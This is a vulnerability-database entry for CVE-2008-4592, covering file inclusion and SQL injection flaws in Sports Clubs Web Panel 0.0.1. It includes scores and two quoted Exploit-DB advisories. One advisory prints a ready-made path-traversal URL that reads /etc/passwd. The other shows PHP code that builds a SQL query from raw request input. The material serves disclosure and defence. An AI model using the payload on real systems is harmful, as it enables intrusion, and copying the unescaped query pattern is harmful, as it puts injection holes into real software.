CVE-2008-4592
published 2008-10-16CVE-2008-4592: Directory traversal vulnerability in index.php in Sports Clubs Web Panel 0.0.1 allows remote attackers to include and execute arbitrary local files via a .…
PriorityP348critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.01%
89.3th percentile
Directory traversal vulnerability in index.php in Sports Clubs Web Panel 0.0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the p parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sportspanel | sports_clubs_web_portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection
exploitdb·2008-09-11
CVE-2008-4592 Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection
---
###################################################################################
# #
# ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::.... #
###################################################################################
Virangar Security Team
www.virangar.net
Discoverd By :virangar security team(Zahra:zh_virangar)
special tnx :my master hadihadi
tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007
& all virangar members & all hackerz
vuln codes in /include/draw-view.php:
line 22: if(isset($_GET['id']) || isset($_POST['id'])) {
lin 23: $teamid = $_GET['id'].$_POST['id'];
...
...
line 43: $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");
vuln codes in /include/draw-ed
Exploit-DB
Sports Clubs Web Panel 0.0.1 - 'p' Local File Inclusion
exploitdb·2008-09-11
CVE-2008-4592 Sports Clubs Web Panel 0.0.1 - 'p' Local File Inclusion
Sports Clubs Web Panel 0.0.1 - 'p' Local File Inclusion
---
--==+============================================================================+==--
--==+ Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability +==--
--==+============================================================================+==--
[*] Discovered By: StAkeR ~ [email protected]
[+] Discovered On: 11 Sep 2008
[+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
[*] Vulnerability:
[*] LFI
[+] index.php?p= [File %00]
[+] http://site.com/index.php?p=../../../../../../../etc/passwd%00
# milw0rm.com [2008-09-11]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4423http://www.vupen.com/english/advisories/2008/2550https://exchange.xforce.ibmcloud.com/vulnerabilities/45062https://www.exploit-db.com/exploits/6427http://securityreason.com/securityalert/4423http://www.vupen.com/english/advisories/2008/2550https://exchange.xforce.ibmcloud.com/vulnerabilities/45062https://www.exploit-db.com/exploits/6427
2008-10-16
Published